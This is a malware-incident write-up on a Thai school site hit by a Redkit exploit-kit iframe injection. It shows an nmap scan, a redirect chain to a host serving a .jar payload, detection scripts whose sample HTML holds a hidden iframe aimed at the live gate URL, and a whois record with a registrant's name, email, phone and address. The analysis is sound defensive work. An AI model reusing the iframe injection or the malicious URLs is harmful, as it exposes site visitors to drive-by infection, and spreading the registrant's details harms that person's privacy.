Malware check: Redkit exploit kit iframe injection
++++++++++++++++++++++++++++++++++++++++++++++
Incident found
++++++++++++++++++++++++++++++++++++++++++++++
At http://www.cru.ac.th/cru_web/
Host check from the network (nmap service/version scan of 110.77.220.122)
++++++++++++++++++++++++++++++++++++++++++++++
Nmap scan report for 110.77.220.122
Host is up (0.31s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (before 2.0.8) or WU-FTPD
|_banner: 220 Welcome to CRU FTP services.
22/tcp  open   ssh      OpenSSH 4.3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_4.3
25/tcp  closed smtp
80/tcp  open   http     Apache httpd 2.2.3 ((CentOS))
| http-headers:
|   Date: Tue, 23 Jul 2013 06:40:32 GMT
|   Server: Apache/2.2.3 (CentOS)
|   Last-Modified: Wed, 10 Jul 2013 07:45:56 GMT
|   ETag: "1426800c-1556e-4e12377bfb500"
|   Accept-Ranges: bytes
|   Content-Length: 87406
|   Connection: close
|   Content-Type: text/html
|
|_  (Request type: GET)
| http-title: \xE0\xB9\x82\xE0\xB8\xA3\xE0\xB8\x87\xE0\xB9\x80\xE0\xB8\xA3\xE0\xB8\xB5\xE0\xB8\xA2\xE0\xB8\x99\xE0\xB8\x8A\xE0\xB8\xA5\xE0\xB8\xA3\xE0\xB8\xB2\xE0\xB8\xA9\xE0\xB8\x8F\xE0\xB8\xA3\xE0\xB8\xAD\xE0\xB8\xB3\xE0\xB8\xA3\xE0\xB8\xB8\xE0\xB8\x87 \xE0...
|_Requested resource was http://110.77.220.122/cru_web/
110/tcp closed pop3
143/tcp closed imap
443/tcp open   ssl/http Apache httpd 2.2.3 ((CentOS))
| http-headers:
|_  (Request type: GET)
| ssl-cert: Subject: commonName=Chon1/organizationName=Chonradsadornumrung School/stateOrProvinceName=Chonburi/countryName=TH/emailAddress=cru_school@hotmail.com/localityName=Chonburi/organizationalUnitName=Chonchai
| Issuer: commonName=Chon1/organizationName=Chonradsadornumrung School/stateOrProvinceName=Chonburi/countryName=TH/emailAddress=cru_school@hotmail.com/localityName=Chonburi/organizationalUnitName=Chonchai
| Public Key type: rsa
| Public Key bits: 1024
| Not valid before: 2012-05-14T14:37:18+00:00
| Not valid after:  2032-05-09T14:37:18+00:00
| MD5:   394a 5a16 1dfb f58a 3705 69dc 47a5 4908
| SHA-1: 57c1 542d 00cd 6554 b04d 3d54 13ff bec0 d3fd d194
| -----BEGIN CERTIFICATE-----
| MIICvTCCAiYCCQDdu+DGElp74DANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMC
| VEgxETAPBgNVBAgTCENob25idXJpMREwDwYDVQQHEwhDaG9uYnVyaTEjMCEGA1UE
| ChMaQ2hvbnJhZHNhZG9ybnVtcnVuZyBTY2hvb2wxETAPBgNVBAsTCENob25jaGFp
| MQ4wDAYDVQQDEwVDaG9uMTElMCMGCSqGSIb3DQEJARYWY3J1X3NjaG9vbEBob3Rt
| YWlsLmNvbTAeFw0xMjA1MTQxNDM3MThaFw0zMjA1MDkxNDM3MThaMIGiMQswCQYD
| VQQGEwJUSDERMA8GA1UECBMIQ2hvbmJ1cmkxETAPBgNVBAcTCENob25idXJpMSMw
| IQYDVQQKExpDaG9ucmFkc2Fkb3JudW1ydW5nIFNjaG9vbDERMA8GA1UECxMIQ2hv
| bmNoYWkxDjAMBgNVBAMTBUNob24xMSUwIwYJKoZIhvcNAQkBFhZjcnVfc2Nob29s
| QGhvdG1haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUNiDSmaZ3
| neIoKKaDubNIT3tKHx8y84L7bfs+xC319iNtgHFv/DsnaQS4tjPVrI3jorK8FDzV
| K9n5TNLIEarayHft7HOzToerNcwYshrArb8qpXrRD7SJoHfmMH5z+CE9TqFQEh22
| fDssKN0+/mA2/GMsxX7P1D5VbAm+BdM95QIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
| AG051xp8Q6hvcW+IhJRXAanVKtod7TXG4ZVQ0Elx8AxsnGdk4rD0mvPXE7vWf7bG
| onvP8eBQKv4SvHLDzee9qxRxwcZAGXsI80TagIG0ekI4q03Nk3RiaycWDgP7kR48
| BOhMR+pMi8RQfZTdjBK14GOD/wgpBVlA2ycvg+87ZOwg
|_-----END CERTIFICATE-----
Aggressive OS guesses: Linux 2.6.18 (92%), Linux 2.6.32 (92%), FreeBSD 6.2-RELEASE (91%), Linux 2.6.9 - 2.6.18 (91%), Cisco UC320W PBX (Linux 2.6) (90%), Linux 2.6.9 (90%), Linux 2.6.22.1-32.fc6 (x86, SMP) (89%), Linux 2.6.5 (89%), Linux 2.6.11 (89%), Linux 2.6.28 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CRU

Host script results:
| asn-query:
| BGP: 110.77.220.0/24 and 110.77.208.0/20
| Country: TH
| Origin AS: 131090 - CAT-IDC-4BYTENET-AS-AP CAT TELECOM Public Company Ltd,CAT
|_ Peer AS: 4651
| dns-blacklist:
|   SPAM
|_    l2.apews.org - SPAM
| hostmap-ip2hosts:
|   hosts:
|     cru.ac.th
|_    www.cru.ac.th
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Connections
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Anomaly found
Caused by a hidden iframe in the web page that loads a malware domain
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<embed width="210" height="210" src="source/swf/clock.swf" quality="high"
pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash">
<embed width="864" height="354" src="source/swf/banner.swf" quality="high"
pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash">
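The snippet above shows only the Flash embeds that surround the injection; the injected iframe markup itself is not reproduced on this page. As an added example (not code from the original write-up), the following Python script looks for the kind of hidden iframe described: off-site, shrunk to 1x1, CSS-hidden or pushed off-screen, or matching the landing-page URL shape seen later in the request log. The sample HTML is constructed: the two Flash embeds are copied from the page, while the hidden iframe and the same-site iframe are hypothetical, and the URL-shape regex is a fingerprint derived only from the URLs observed in this incident.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample, not the compromised page's markup: the two Flash embeds
# from the write-up plus a HYPOTHETICAL hidden iframe shaped like the Redkit
# gate URL seen in the request log (mybodybuildingjourney.com/oeef.html?j=...),
# and one ordinary same-site iframe that should not be flagged.
SAMPLE_HTML = """
<html><body>
<embed width="210" height="210" src="source/swf/clock.swf" quality="high"
      type="application/x-shockwave-flash">
<embed width="864" height="354" src="source/swf/banner.swf" quality="high"
      type="application/x-shockwave-flash">
<iframe src="http://mybodybuildingjourney.com/oeef.html?j=3267321" width="1" height="1"
        style="visibility:hidden; position:absolute; left:-9999px"></iframe>
<iframe src="http://www.cru.ac.th/cru_web/news.html" width="600" height="400"></iframe>
</body></html>
"""

SITE_HOST = "www.cru.ac.th"

# URL shape of the landing pages observed in this write-up (oeef.html?j=3267321,
# oaaf.html?j=3267321): four lowercase letters, .html, one-letter numeric query.
# It is a fingerprint derived from this incident, not a general Redkit signature.
LANDING_SHAPE = re.compile(r"/[a-z]{4}\.html\?[a-z]=\d+$")


def _px(value):
    """Parse a width/height attribute; None if it is not a plain pixel count."""
    try:
        return int(str(value).strip().lower().rstrip("px"))
    except ValueError:
        return None


class IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def hidden_reasons(attrs):
    """Return why an iframe looks deliberately hidden (empty list = visible)."""
    reasons = []
    w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append("1x1 or 0x0 dimensions")
    style = attrs.get("style", "").lower().replace(" ", "")
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("css hidden")
    if re.search(r"(left|top):-\d{3,}", style):
        reasons.append("positioned off-screen")
    return reasons


def scan_iframes(html, site_host):
    """Return findings for iframes that are off-site, hidden, or match the landing shape."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src = same site
        reasons = hidden_reasons(attrs)
        if LANDING_SHAPE.search(src):
            reasons.append("matches observed landing-page URL shape")
        offsite = host != site_host
        if offsite or reasons:
            findings.append({"src": src, "host": host, "offsite": offsite, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_iframes(SAMPLE_HTML, SITE_HOST):
        print(f"{'OFF-SITE' if f['offsite'] else 'same-site'} iframe -> {f['src']}")
        for r in f["reasons"]:
            print("   ", r)
```

Run it against a saved copy of the page (fetched with a non-browser client so the exploit kit is not triggered) rather than the live site; any off-site iframe on a site that has no reason to embed third-party content is worth pulling apart, and a hidden one is the injection.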
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Request check
++++++++++++++++++++++++++++++++++++++++++
URL | Status | Content Type |
---|---|---|
http://www.cru.ac.th/ | 302 | text/html |
http://www.cru.ac.th/cru_web/ | 200 | text/html |
http://www.cru.ac.th/cru_web/js/jquery.js | 200 | application/x-javascript |
http://mybodybuildingjourney.com/oeef.html?j=3267321 | 301 | text/html |
http://mikeborge.com/oeef.html?j=3267321 | 200 | text/html |
http://mikeborge.com/0o4.jar | 200 | application/zip |
about:blank | 200 | text/html |
http://www.cru.ac.th/cru_web/js/easySlider1.7.js | 200 | application/x-javascript |
http://www.cru.ac.th/cru_web/Scripts/AC_RunActiveContent.js | 200 | application/x-javascript |
http://www.cru.ac.th/cru_web/source/swf/banner.swf | 200 | application/x-shockwave-flash |
http://www.cru.ac.th/cru_web/source/swf/clock.swf | 200 | application/x-shockwave-flash |
http://artisticgenepool.com/oaaf.html?j=3267321 | 301 | text/html |
http://mikeborge.com/oaaf.html?j=3267321 | 404 | empty |
http://mybodybuildingjourney.com/oeef.html?i=3267321 | 301 | text/html |
http://mikeborge.com/oeef.html?i=3267321 | 404 | empty |
http://www.cru.ac.th/cru_web/css/mainMenu.css | 200 | text/css |
http://www.cru.ac.th/cru_web/css/screen.css | 404 | text/html |
http://www.cru.ac.th/cru_web/css/topMenu.css | 200 | text/css |
http://www.cru.ac.th/cru_web/css/personMenu.css | 404 | text/html |
Redirects
From | To |
---|---|
http://www.cru.ac.th/ | http://www.cru.ac.th/cru_web/ |
http://mybodybuildingjourney.com/oeef.html?j=3267321 | http://mikeborge.com/oeef.html?j=3267321 |
http://artisticgenepool.com/oaaf.html?j=3267321 | http://mikeborge.com/oaaf.html?j=3267321 |
http://mybodybuildingjourney.com/oeef.html?i=3267321 | http://mikeborge.com/oeef.html?i=3267321 |
ActiveX controls
D27CDB6E-AE6D-11CF-96B8-444553540000 (Shockwave Flash)
Name | Value | Attributes |
---|---|---|
movie | source/swf/clock.swf | |
jQuery1366577423256 | 147.0 | |
 | 1022.0 | |
quality | high | |
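The request log and redirect table above show the usual exploit-kit shape: the compromised page pulls a gate domain (mybodybuildingjourney.com, artisticgenepool.com), the gate answers 301 to the landing host (mikeborge.com), and the landing host serves the Java archive 0o4.jar as application/zip. As an added example, not part of the original write-up, the Python script below reconstructs that chain from the rows transcribed from the tables above. The payload indicators (content types, file extensions) and the reading of "first hop = gate, last hop = landing" are the editor's assumptions; the remaining same-site assets and about:blank are omitted from the transcription.

```python
from urllib.parse import urlparse

SITE_HOST = "www.cru.ac.th"

# Transcribed from the request log and redirect table in this write-up
# (URL, HTTP status, content type); same-site static assets are trimmed.
REQUESTS = [
    ("http://www.cru.ac.th/", 302, "text/html"),
    ("http://www.cru.ac.th/cru_web/", 200, "text/html"),
    ("http://www.cru.ac.th/cru_web/js/jquery.js", 200, "application/x-javascript"),
    ("http://mybodybuildingjourney.com/oeef.html?j=3267321", 301, "text/html"),
    ("http://mikeborge.com/oeef.html?j=3267321", 200, "text/html"),
    ("http://mikeborge.com/0o4.jar", 200, "application/zip"),
    ("http://www.cru.ac.th/cru_web/source/swf/banner.swf", 200, "application/x-shockwave-flash"),
    ("http://artisticgenepool.com/oaaf.html?j=3267321", 301, "text/html"),
    ("http://mikeborge.com/oaaf.html?j=3267321", 404, "empty"),
    ("http://mybodybuildingjourney.com/oeef.html?i=3267321", 301, "text/html"),
    ("http://mikeborge.com/oeef.html?i=3267321", 404, "empty"),
]
REDIRECTS = [
    ("http://www.cru.ac.th/", "http://www.cru.ac.th/cru_web/"),
    ("http://mybodybuildingjourney.com/oeef.html?j=3267321", "http://mikeborge.com/oeef.html?j=3267321"),
    ("http://artisticgenepool.com/oaaf.html?j=3267321", "http://mikeborge.com/oaaf.html?j=3267321"),
    ("http://mybodybuildingjourney.com/oeef.html?i=3267321", "http://mikeborge.com/oeef.html?i=3267321"),
]

# Assumed payload indicators: a Java archive (served here as application/zip)
# or an executable fetched from a host other than the site itself.
PAYLOAD_TYPES = {"application/zip", "application/java-archive", "application/octet-stream"}
PAYLOAD_EXTENSIONS = (".jar", ".exe")


def host_of(url):
    return urlparse(url).hostname or ""


def redirect_chains(redirects):
    """Join From->To pairs into full chains, starting from URLs nothing redirects to."""
    nxt = dict(redirects)
    targets = set(nxt.values())
    chains = []
    for start in nxt:
        if start in targets:
            continue
        chain, cur = [start], start
        while cur in nxt and nxt[cur] not in chain:  # stop on loops
            cur = nxt[cur]
            chain.append(cur)
        chains.append(chain)
    return chains


def triage(requests, redirects, site_host):
    """Separate the compromised site's own traffic from the exploit-kit chain."""
    offsite_hosts = sorted({host_of(u) for u, _, _ in requests if host_of(u) != site_host})
    payloads = [
        u for u, status, ctype in requests
        if host_of(u) != site_host and status == 200
        and (ctype in PAYLOAD_TYPES or u.lower().endswith(PAYLOAD_EXTENSIONS))
    ]
    chains = [c for c in redirect_chains(redirects) if any(host_of(u) != site_host for u in c)]
    return {
        "offsite_hosts": offsite_hosts,
        "chains": chains,
        "gates": sorted({host_of(c[0]) for c in chains}),      # first hop: what the page was injected with
        "landings": sorted({host_of(c[-1]) for c in chains}),  # last hop: serves the landing page
        "payloads": payloads,
    }


if __name__ == "__main__":
    result = triage(REQUESTS, REDIRECTS, SITE_HOST)
    for chain in result["chains"]:
        print(" -> ".join(chain))
    print("gates:", result["gates"])
    print("landing hosts:", result["landings"])
    print("payloads:", result["payloads"])
```

The gate domains are the ones to block and to search for in the web proxy logs, since they are what every victim browser contacts first; the landing host and the archive name rotate more often. A .jar fetched from a host the user never deliberately visited, right after a 301 from another third-party host, is the pattern to alert on.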
=================================
HTTP check
=================================
Loading the HTTP capture as a proxied request shows the connection to the malware site mybodybuildingjourney.com
==============================================================
Whois check
==============================================================
Domain name: mybodybuildingjourney.com
Registrant Contact:
Pete81
Petri Olsson ()
Fax:
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Administrative Contact:
Pete81
Petri Olsson (holaluna81@yahoo.com)
+358.405079703
Fax: +1.5555555555
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Technical Contact:
Pete81
Petri Olsson (holaluna81@yahoo.com)
+358.405079703
Fax: +1.5555555555
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Status: Locked
Name Servers:
ns3321.hostgator.com
ns3322.hostgator.com
Creation date: 15 Oct 2009 16:41:05
Expiration date: 15 Oct 2013 16:41:05
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Links
https://www.virustotal.com/th/url/e23ec6b60262684212b39c1751a04d5fe8c573beb91826b30c50684c257ee39f/analysis/
http://wepawet.iseclab.org/view.php?hash=66100e0d535a4c1119acb647613b4b70&t=1366577405&type=js
http://urlquery.net/report.php?id=2104305
http://checkip.me/whomap.php?domain=mybodybuildingjourney.com